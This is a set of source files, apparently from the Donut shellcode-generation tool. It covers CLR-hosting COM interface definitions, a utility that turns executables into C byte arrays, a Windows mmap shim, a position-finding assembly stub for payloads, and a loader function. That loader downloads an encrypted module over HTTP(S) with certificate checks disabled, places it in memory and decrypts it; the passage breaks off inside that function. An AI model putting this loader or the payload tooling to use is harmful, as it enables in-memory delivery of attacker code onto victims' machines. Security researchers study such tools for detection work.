815 | ICorConfigurationVtbl *lpVtbl; | |
816 | }ICorConfiguration; | |
817 | ||
818 | typedef struct IGCThreadControlVtbl | |
819 | { | |
820 | BEGIN_INTERFACE | |
821 | ||
822 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
823 | IGCThreadControl * This, | |
824 | /* [in] */ REFIID riid, | |
825 | /* [iid_is][out] */ | |
826 | __RPC__deref_out void **ppvObject); | |
827 | ||
828 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
829 | IGCThreadControl * This); | |
830 | ||
831 | ULONG ( STDMETHODCALLTYPE *Release )( | |
832 | IGCThreadControl * This); | |
833 | ||
834 | HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForSuspension )( | |
835 | IGCThreadControl * This); | |
836 | ||
837 | HRESULT ( STDMETHODCALLTYPE *SuspensionStarting )( | |
838 | IGCThreadControl * This); | |
839 | ||
840 | HRESULT ( STDMETHODCALLTYPE *SuspensionEnding )( | |
841 | IGCThreadControl * This, | |
842 | DWORD Generation); | |
843 | ||
844 | END_INTERFACE | |
845 | } IGCThreadControlVtbl; | |
846 | ||
847 | typedef struct _IGCThreadControl | |
848 | { | |
849 | IGCThreadControlVtbl *lpVtbl; | |
850 | }IGCThreadControl; | |
851 | ||
852 | typedef struct IGCHostControlVtbl | |
853 | { | |
854 | BEGIN_INTERFACE | |
855 | ||
856 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
857 | IGCHostControl * This, | |
858 | /* [in] */ REFIID riid, | |
859 | /* [iid_is][out] */ | |
860 | __RPC__deref_out void **ppvObject); | |
861 | ||
862 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
863 | IGCHostControl * This); | |
864 | ||
865 | ULONG ( STDMETHODCALLTYPE *Release )( | |
866 | IGCHostControl * This); | |
867 | ||
868 | HRESULT ( STDMETHODCALLTYPE *RequestVirtualMemLimit )( | |
869 | IGCHostControl * This, | |
870 | /* [in] */ SIZE_T sztMaxVirtualMemMB, | |
871 | /* [out][in] */ SIZE_T *psztNewMaxVirtualMemMB); | |
872 | ||
873 | END_INTERFACE | |
874 | } IGCHostControlVtbl; | |
875 | ||
876 | typedef struct _IGCHostControl | |
877 | { | |
878 | IGCHostControlVtbl *lpVtbl; | |
879 | } IGCHostControl; | |
880 | ||
881 | typedef struct IDebuggerThreadControlVtbl | |
882 | { | |
883 | BEGIN_INTERFACE | |
884 | ||
885 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
886 | IDebuggerThreadControl * This, | |
887 | /* [in] */ REFIID riid, | |
888 | /* [iid_is][out] */ | |
889 | __RPC__deref_out void **ppvObject); | |
890 | ||
891 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
892 | IDebuggerThreadControl * This); | |
893 | ||
894 | ULONG ( STDMETHODCALLTYPE *Release )( | |
895 | IDebuggerThreadControl * This); | |
896 | ||
897 | HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForDebugger)( | |
898 | IDebuggerThreadControl * This); | |
899 | ||
900 | HRESULT ( STDMETHODCALLTYPE *ReleaseAllRuntimeThreads)( | |
901 | IDebuggerThreadControl * This); | |
902 | ||
903 | HRESULT ( STDMETHODCALLTYPE *StartBlockingForDebugger)( | |
904 | IDebuggerThreadControl * This, | |
905 | DWORD dwUnused); | |
906 | ||
907 | END_INTERFACE | |
908 | } IDebuggerThreadControlVtbl; | |
909 | ||
910 | typedef struct _IDebuggerThreadControl { | |
911 | IDebuggerThreadControlVtbl *lpVtbl; | |
912 | } IDebuggerThreadControl; | |
913 | ||
914 | #endif | |
915 | ⏎ |
0 | exe2h: | |
1 | x86_64-w64-mingw32-gcc exe2h.c mmap-windows.c -lshlwapi -oexe2h.exe | |
2 | clean: | |
3 | rm exe2h.exe *.o |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include <stdio.h> | |
32 | #include <string.h> | |
33 | #include <stdlib.h> | |
34 | #include <stdint.h> | |
35 | #include <ctype.h> | |
36 | ||
37 | #include <fcntl.h> | |
38 | #include <errno.h> | |
39 | #include <sys/types.h> | |
40 | #include <sys/stat.h> | |
41 | ||
42 | #if defined(_WIN32) || defined(_WIN64) | |
43 | #define WINDOWS | |
44 | #include <windows.h> | |
45 | #include <shlwapi.h> | |
46 | #include "mmap.h" | |
47 | #pragma comment(lib, "shlwapi.lib") | |
48 | #else | |
49 | #define NIX | |
50 | #include <libgen.h> | |
51 | #include <sys/mman.h> | |
52 | #include <unistd.h> | |
53 | #include <pe.h> | |
54 | #endif | |
55 | ||
56 | // return pointer to DOS header | |
57 | PIMAGE_DOS_HEADER DosHdr(void *map) { | |
58 | return (PIMAGE_DOS_HEADER)map; | |
59 | } | |
60 | ||
61 | // return pointer to NT header | |
62 | PIMAGE_NT_HEADERS NtHdr (void *map) { | |
63 | return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew); | |
64 | } | |
65 | ||
66 | // return pointer to File header | |
67 | PIMAGE_FILE_HEADER FileHdr (void *map) { | |
68 | return &NtHdr(map)->FileHeader; | |
69 | } | |
70 | ||
71 | // determines CPU architecture of binary | |
72 | int is32 (void *map) { | |
73 | return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386; | |
74 | } | |
75 | ||
76 | // determines CPU architecture of binary | |
77 | int is64 (void *map) { | |
78 | return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_AMD64; | |
79 | } | |
80 | ||
81 | // return pointer to Optional header | |
82 | void* OptHdr (void *map) { | |
83 | return (void*)&NtHdr(map)->OptionalHeader; | |
84 | } | |
85 | ||
86 | // return pointer to first section header | |
87 | PIMAGE_SECTION_HEADER SecHdr (void *map) { | |
88 | PIMAGE_NT_HEADERS nt = NtHdr(map); | |
89 | ||
90 | return (PIMAGE_SECTION_HEADER)((uint8_t*)&nt->OptionalHeader + | |
91 | nt->FileHeader.SizeOfOptionalHeader); | |
92 | } | |
93 | ||
94 | uint32_t DirSize (void *map) { | |
95 | if (is32(map)) { | |
96 | return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->NumberOfRvaAndSizes; | |
97 | } else { | |
98 | return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->NumberOfRvaAndSizes; | |
99 | } | |
100 | } | |
101 | ||
102 | uint32_t SecSize (void *map) { | |
103 | return NtHdr(map)->FileHeader.NumberOfSections; | |
104 | } | |
105 | ||
106 | PIMAGE_DATA_DIRECTORY Dirs (void *map) { | |
107 | if (is32(map)) { | |
108 | return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory; | |
109 | } else { | |
110 | return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory; | |
111 | } | |
112 | } | |
113 | ||
114 | uint64_t ImgBase (void *map) { | |
115 | if (is32(map)) { | |
116 | return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->ImageBase; | |
117 | } else { | |
118 | return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->ImageBase; | |
119 | } | |
120 | } | |
121 | ||
122 | // valid dos header? | |
123 | int valid_dos_hdr (void *map) { | |
124 | PIMAGE_DOS_HEADER dos = DosHdr(map); | |
125 | ||
126 | if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0; | |
127 | return (dos->e_lfanew != 0); | |
128 | } | |
129 | ||
130 | // valid nt headers | |
131 | int valid_nt_hdr (void *map) { | |
132 | return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE; | |
133 | } | |
134 | ||
135 | uint32_t rva2ofs (void *map, uint32_t rva) { | |
136 | int i; | |
137 | ||
138 | PIMAGE_SECTION_HEADER sh = SecHdr(map); | |
139 | ||
140 | for (i=0; i<SecSize(map); i++) { | |
141 | if (rva >= sh[i].VirtualAddress && rva < sh[i].VirtualAddress + sh[i].SizeOfRawData) | |
142 | return sh[i].PointerToRawData + (rva - sh[i].VirtualAddress); | |
143 | } | |
144 | return -1; | |
145 | } | |
146 | ||
147 | void bin2h(void *map, char *fname, void *bin, uint32_t len) { | |
148 | char label[32], file[32], *str; | |
149 | uint32_t i; | |
150 | uint8_t *p=(uint8_t*)bin; | |
151 | FILE *fd; | |
152 | ||
153 | memset(label, 0, sizeof(label)); | |
154 | memset(file, 0, sizeof(file)); | |
155 | ||
156 | #if defined(WINDOWS) | |
157 | str = PathFindFileName(fname); | |
158 | #else | |
159 | str = basename(fname); | |
160 | #endif | |
161 | for(i=0; str[i] != 0 && i < 16;i++) { | |
162 | if(str[i] == '.') { | |
163 | file[i] = label[i] = '_'; | |
164 | } else { | |
165 | label[i] = toupper(str[i]); | |
166 | file[i] = tolower(str[i]); | |
167 | } | |
168 | } | |
169 | if(map != NULL) { | |
170 | strcat(label, is32(map) ? "_X86" : "_X64"); | |
171 | strcat(file, is32(map) ? "_x86" : "_x64"); | |
172 | } | |
173 | strcat(file, ".h"); | |
174 | ||
175 | fd = fopen(file, "wb"); | |
176 | ||
177 | if(fd != NULL) { | |
178 | fprintf(fd, "\nunsigned char %s[] = {", label); | |
179 | ||
180 | for(i=0;i<len;i++) { | |
181 | if(!(i % 12)) fprintf(fd, "\n "); | |
182 | fprintf(fd, "0x%02x", p[i]); | |
183 | if((i+1) != len) fprintf(fd, ", "); | |
184 | } | |
185 | fprintf(fd, "};\n\n"); | |
186 | fclose(fd); | |
187 | printf(" [ saved code to %s\n", file); | |
188 | } else printf(" [ unable to create file : %s\n", file); | |
189 | } | |
190 | ||
191 | /** | |
192 | void bin2array(void *map, char *fname, void *bin, uint32_t len) { | |
193 | char label[32], file[32], *str; | |
194 | uint32_t i; | |
195 | uint32_t *p=(uint32_t*)bin; | |
196 | FILE *fd; | |
197 | ||
198 | memset(label, 0, sizeof(label)); | |
199 | memset(file, 0, sizeof(file)); | |
200 | ||
201 | #if defined(WINDOWS) | |
202 | str = PathFindFileName(fname); | |
203 | #else | |
204 | str = basename(fname); | |
205 | #endif | |
206 | for(i=0; str[i] != 0 && i < 16;i++) { | |
207 | if(str[i] == '.') { | |
208 | file[i] = label[i] = '_'; | |
209 | } else { | |
210 | label[i] = toupper(str[i]); | |
211 | file[i] = tolower(str[i]); | |
212 | } | |
213 | } | |
214 | ||
215 | strcat(file, ".h"); | |
216 | ||
217 | fd = fopen(file, "wb"); | |
218 | ||
219 | if(fd != NULL) { | |
220 | // align up by 4 | |
221 | len = (len & -4) + 4; | |
222 | len >>= 2; | |
223 | ||
224 | // declare the array | |
225 | fprintf(fd, "\nunsigned int %s[%i];\n\n", label, len); | |
226 | ||
227 | // initialize array | |
228 | for(i=0; i<len; i++) { | |
229 | fprintf(fd, "%s[%i] = 0x%08" PRIX32 ";\n", label, i, p[i]); | |
230 | } | |
231 | fclose(fd); | |
232 | printf(" [ Saved array to %s\n", file); | |
233 | } else printf(" [ unable to create file : %s\n", file); | |
234 | } | |
235 | */ | |
236 | // structure of COFF (.obj) file | |
237 | ||
238 | //--------------------------// | |
239 | // IMAGE_FILE_HEADER // | |
240 | //--------------------------// | |
241 | // IMAGE_SECTION_HEADER // | |
242 | // * num sections // | |
243 | //--------------------------// | |
244 | // // | |
245 | // // | |
246 | // // | |
247 | // section data // | |
248 | // * num sections // | |
249 | // // | |
250 | // // | |
251 | //--------------------------// | |
252 | // IMAGE_SYMBOL // | |
253 | // * num symbols // | |
254 | //--------------------------// | |
255 | // string table // | |
256 | //--------------------------// | |
257 | ||
258 | int main (int argc, char *argv[]) { | |
259 | int fd, i; | |
260 | struct stat fs; | |
261 | uint8_t *map, *cs; | |
262 | PIMAGE_SECTION_HEADER sh; | |
263 | //PIMAGE_FILE_HEADER fh; | |
264 | //PIMAGE_COFF_SYMBOLS_HEADER csh; | |
265 | uint32_t ofs, len; | |
266 | ||
267 | if (argc != 2) { | |
268 | printf ("\n [ usage: file2h <file.exe | file.bin>\n"); | |
269 | return 0; | |
270 | } | |
271 | ||
272 | // open file for reading | |
273 | fd = open(argv[1], O_RDONLY); | |
274 | ||
275 | if(fd == 0) { | |
276 | printf(" [ unable to open %s\n", argv[1]); | |
277 | return 0; | |
278 | } | |
279 | // if file has some data | |
280 | if(fstat(fd, &fs) == 0) { | |
281 | // map into memory | |
282 | map = (uint8_t*)mmap(NULL, fs.st_size, | |
283 | PROT_READ, MAP_PRIVATE, fd, 0); | |
284 | if(map != NULL) { | |
285 | if(valid_dos_hdr(map) && valid_nt_hdr(map)) { | |
286 | printf(" [ Found valid DOS and NT header.\n"); | |
287 | // get the .text section | |
288 | sh = SecHdr(map); | |
289 | // if a section header was returned | |
290 | if(sh != NULL) { | |
291 | printf(" [ Locating .text section.\n"); | |
292 | // locate the .text section | |
293 | for(i=0; i<SecSize(map); i++) { | |
294 | if(strcmp((char*)sh[i].Name, ".text") == 0) { | |
295 | ofs = rva2ofs(map, sh[i].VirtualAddress); | |
296 | ||
297 | if(ofs != -1) { | |
298 | cs = (map + ofs); | |
299 | len = sh[i].Misc.VirtualSize; | |
300 | // convert to header file | |
301 | bin2h(map, argv[1], cs, len); | |
302 | break; | |
303 | } | |
304 | } | |
305 | } | |
306 | } | |
307 | } else { | |
308 | printf(" [ No valid DOS or NT header found.\n"); | |
309 | // treat file as binary | |
310 | bin2h(NULL, argv[1], map, fs.st_size); | |
311 | //bin2array(NULL, argv[1], map, fs.st_size); | |
312 | } | |
313 | munmap(map, fs.st_size); | |
314 | } | |
315 | } | |
316 | close(fd); | |
317 | return 0; | |
318 | } |
Binary diff not shown
0 | /* mmap() replacement for Windows | |
1 | * | |
2 | * Author: Mike Frysinger <[email protected]> | |
3 | * Placed into the public domain | |
4 | */ | |
5 | ||
6 | /* References: | |
7 | * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx | |
8 | * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx | |
9 | * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx | |
10 | * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx | |
11 | */ | |
12 | ||
13 | #include "mmap.h" | |
14 | ||
15 | void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset) | |
16 | { | |
17 | if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC)) | |
18 | return MAP_FAILED; | |
19 | if (fd == -1) { | |
20 | if (!(flags & MAP_ANON) || offset) | |
21 | return MAP_FAILED; | |
22 | } else if (flags & MAP_ANON) | |
23 | return MAP_FAILED; | |
24 | ||
25 | DWORD flProtect; | |
26 | if (prot & PROT_WRITE) { | |
27 | if (prot & PROT_EXEC) | |
28 | flProtect = PAGE_EXECUTE_READWRITE; | |
29 | else | |
30 | flProtect = PAGE_READWRITE; | |
31 | } else if (prot & PROT_EXEC) { | |
32 | if (prot & PROT_READ) | |
33 | flProtect = PAGE_EXECUTE_READ; | |
34 | else if (prot & PROT_EXEC) | |
35 | flProtect = PAGE_EXECUTE; | |
36 | } else | |
37 | flProtect = PAGE_READONLY; | |
38 | ||
39 | off_t end = length + offset; | |
40 | HANDLE mmap_fd, h; | |
41 | if (fd == -1) | |
42 | mmap_fd = INVALID_HANDLE_VALUE; | |
43 | else | |
44 | mmap_fd = (HANDLE)_get_osfhandle(fd); | |
45 | h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL); | |
46 | if (h == NULL) | |
47 | return MAP_FAILED; | |
48 | ||
49 | DWORD dwDesiredAccess; | |
50 | if (prot & PROT_WRITE) | |
51 | dwDesiredAccess = FILE_MAP_WRITE; | |
52 | else | |
53 | dwDesiredAccess = FILE_MAP_READ; | |
54 | if (prot & PROT_EXEC) | |
55 | dwDesiredAccess |= FILE_MAP_EXECUTE; | |
56 | if (flags & MAP_PRIVATE) | |
57 | dwDesiredAccess |= FILE_MAP_COPY; | |
58 | void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length); | |
59 | if (ret == NULL) { | |
60 | CloseHandle(h); | |
61 | ret = MAP_FAILED; | |
62 | } | |
63 | return ret; | |
64 | } | |
65 | ||
66 | void munmap(void *addr, size_t length) | |
67 | { | |
68 | UnmapViewOfFile(addr); | |
69 | /* ruh-ro, we leaked handle from CreateFileMapping() ... */ | |
70 | } | |
71 | ||
72 | #undef DWORD_HI | |
73 | #undef DWORD_LO |
Binary diff not shown
0 | ||
1 | ||
2 | #ifndef MMAP_H | |
3 | #define MMAP_H | |
4 | ||
5 | #include <io.h> | |
6 | #include <windows.h> | |
7 | #include <sys/types.h> | |
8 | ||
9 | #define PROT_READ 0x1 | |
10 | #define PROT_WRITE 0x2 | |
11 | /* This flag is only available in WinXP+ */ | |
12 | #ifdef FILE_MAP_EXECUTE | |
13 | #define PROT_EXEC 0x4 | |
14 | #else | |
15 | #define PROT_EXEC 0x0 | |
16 | #define FILE_MAP_EXECUTE 0 | |
17 | #endif | |
18 | ||
19 | #define MAP_SHARED 0x01 | |
20 | #define MAP_PRIVATE 0x02 | |
21 | #define MAP_ANONYMOUS 0x20 | |
22 | #define MAP_ANON MAP_ANONYMOUS | |
23 | #define MAP_FAILED ((void *) -1) | |
24 | ||
25 | #ifdef __USE_FILE_OFFSET64 | |
26 | # define DWORD_HI(x) (x >> 32) | |
27 | # define DWORD_LO(x) ((x) & 0xffffffff) | |
28 | #else | |
29 | # define DWORD_HI(x) (0) | |
30 | # define DWORD_LO(x) (x) | |
31 | #endif | |
32 | ||
33 | #ifdef __cplusplus | |
34 | extern "C" { | |
35 | #endif | |
36 | ||
37 | void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset); | |
38 | void munmap(void *addr, size_t length); | |
39 | ||
40 | #ifdef __cplusplus | |
41 | } | |
42 | #endif | |
43 | ||
44 | #endif⏎ |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | // Function to return the program counter. | |
32 | // Always place this at the end of payload. | |
33 | // Tested with x86 build of MSVC 2019 and MinGW. YMMV. | |
34 | #if defined(_MSC_VER) | |
35 | #if defined(_M_IX86) | |
36 | __declspec(naked) char *get_pc(void) { | |
37 | __asm { | |
38 | call pc_addr | |
39 | pc_addr: | |
40 | pop eax | |
41 | sub eax, 5 | |
42 | ret | |
43 | } | |
44 | } | |
45 | #endif | |
46 | #elif defined(__GNUC__) | |
47 | #if defined(__i386__) | |
48 | asm ( | |
49 | ".global get_pc\n" | |
50 | ".global _get_pc\n" | |
51 | "_get_pc:\n" | |
52 | "get_pc:\n" | |
53 | " call pc_addr\n" | |
54 | "pc_addr:\n" | |
55 | " pop %eax\n" | |
56 | " sub $5, %eax\n" | |
57 | " ret\n" | |
58 | ); | |
59 | #endif | |
60 | #endif |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | BOOL DownloadModule(PDONUT_INSTANCE inst) { | |
32 | HINTERNET hin, con, req; | |
33 | PBYTE buf; | |
34 | DWORD s, n, rd, len, code=0; | |
35 | BOOL bResult = FALSE, bSecure = FALSE; | |
36 | URL_COMPONENTS uc; | |
37 | CHAR host[DONUT_MAX_URL], | |
38 | file[DONUT_MAX_URL]; | |
39 | ||
40 | // default flags for HTTP client | |
41 | DWORD flags = INTERNET_FLAG_KEEP_CONNECTION | | |
42 | INTERNET_FLAG_NO_CACHE_WRITE | | |
43 | INTERNET_FLAG_NO_UI | | |
44 | INTERNET_FLAG_RELOAD | | |
45 | INTERNET_FLAG_NO_AUTO_REDIRECT; | |
46 | ||
47 | Memset(&uc, 0, sizeof(uc)); | |
48 | ||
49 | uc.dwStructSize = sizeof(uc); | |
50 | uc.lpszHostName = host; | |
51 | uc.lpszUrlPath = file; | |
52 | uc.dwHostNameLength = DONUT_MAX_URL; | |
53 | uc.dwUrlPathLength = DONUT_MAX_URL; | |
54 | ||
55 | DPRINT("Decoding URL %s", inst->http.url); | |
56 | ||
57 | if(!inst->api.InternetCrackUrl( | |
58 | inst->http.url, 0, ICU_DECODE, &uc)) { | |
59 | return FALSE; | |
60 | } | |
61 | ||
62 | bSecure = (uc.nScheme == INTERNET_SCHEME_HTTPS); | |
63 | ||
64 | // if secure connection, update the flags to ignore | |
65 | // invalid certificates | |
66 | if(bSecure) { | |
67 | flags |= INTERNET_FLAG_IGNORE_CERT_CN_INVALID | | |
68 | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | | |
69 | INTERNET_FLAG_SECURE; | |
70 | } | |
71 | ||
72 | DPRINT("Initializing WININET"); | |
73 | ||
74 | hin = inst->api.InternetOpen( | |
75 | NULL, INTERNET_OPEN_TYPE_PRECONFIG, | |
76 | NULL, NULL, 0); | |
77 | ||
78 | if(hin == NULL) return FALSE; | |
79 | ||
80 | DPRINT("Creating %s connection for %s", | |
81 | bSecure ? "HTTPS" : "HTTP", host); | |
82 | ||
83 | con = inst->api.InternetConnect( | |
84 | hin, host, | |
85 | bSecure ? INTERNET_DEFAULT_HTTPS_PORT : INTERNET_DEFAULT_HTTP_PORT, | |
86 | NULL, NULL, | |
87 | INTERNET_SERVICE_HTTP, 0, 0); | |
88 | ||
89 | if(con != NULL) { | |
90 | DPRINT("Creating HTTP %s request for %s", | |
91 | inst->http.req, file); | |
92 | ||
93 | req = inst->api.HttpOpenRequest( | |
94 | con, inst->http.req, | |
95 | file, NULL, NULL, NULL, flags, 0); | |
96 | ||
97 | if(req != NULL) { | |
98 | ||
99 | // see if we should ignore invalid certificates for this request | |
100 | if(bSecure) { | |
101 | if(flags & INTERNET_FLAG_IGNORE_CERT_CN_INVALID) { | |
102 | n = sizeof (s); | |
103 | ||
104 | s = SECURITY_FLAG_IGNORE_UNKNOWN_CA | | |
105 | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | | |
106 | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | | |
107 | SECURITY_FLAG_IGNORE_WRONG_USAGE | | |
108 | SECURITY_FLAG_IGNORE_REVOCATION; | |
109 | ||
110 | DPRINT("Setting option to ignore invalid certificates"); | |
111 | ||
112 | inst->api.InternetSetOption( | |
113 | req, | |
114 | INTERNET_OPTION_SECURITY_FLAGS, | |
115 | &s, | |
116 | sizeof(s)); | |
117 | } | |
118 | } | |
119 | DPRINT("Sending request"); | |
120 | ||
121 | if(inst->api.HttpSendRequest(req, NULL, 0, NULL, 0)) { | |
122 | len = sizeof(DWORD); | |
123 | code = 0; | |
124 | DPRINT("Querying status code"); | |
125 | ||
126 | if(inst->api.HttpQueryInfo( | |
127 | req, | |
128 | HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, | |
129 | &code, &len, 0)) | |
130 | { | |
131 | DPRINT("Code is %ld", code); | |
132 | ||
133 | if(code == HTTP_STATUS_OK) { | |
134 | DPRINT("Querying content length"); | |
135 | ||
136 | len = sizeof(SIZE_T); | |
137 | inst->mod_len = 0; | |
138 | ||
139 | if(inst->api.HttpQueryInfo( | |
140 | req, | |
141 | HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER, | |
142 | &inst->mod_len, &len, 0)) | |
143 | { | |
144 | if(inst->mod_len != 0) { | |
145 | DPRINT("Allocating memory for module"); | |
146 | ||
147 | inst->module.p = inst->api.VirtualAlloc( | |
148 | NULL, inst->mod_len, | |
149 | MEM_COMMIT | MEM_RESERVE, | |
150 | PAGE_READWRITE); | |
151 | ||
152 | if(inst->module.p != NULL) { | |
153 | rd = 0; | |
154 | DPRINT("Downloading module into memory"); | |
155 | bResult = inst->api.InternetReadFile( | |
156 | req, | |
157 | inst->module.p, | |
158 | inst->mod_len, &rd); | |
159 | } | |
160 | } | |
161 | } | |
162 | } | |
163 | } | |
164 | } | |
165 | DPRINT("Closing request handle"); | |
166 | inst->api.InternetCloseHandle(req); | |
167 | } | |
168 | DPRINT("Closing HTTP connection"); | |
169 | inst->api.InternetCloseHandle(con); | |
170 | } | |
171 | DPRINT("Closing internet handle"); | |
172 | inst->api.InternetCloseHandle(hin); | |
173 | ||
174 | #if !defined(NOCRYPTO) | |
175 | if(bResult) { | |
176 | PDONUT_MODULE mod = inst->module.p; | |
177 | ||
178 | DPRINT("Decrypting %lli bytes of module", inst->mod_len); | |
179 | ||
180 | donut_decrypt(inst->mod_key.mk, | |
181 | inst->mod_key.ctr, | |
182 | mod, | |
183 | inst->mod_len); | |
184 | ||
185 | DPRINT("Generating hash to verify decryption"); | |
186 | ULONG64 mac = maru(inst->sig, inst->iv); | |
187 | ||
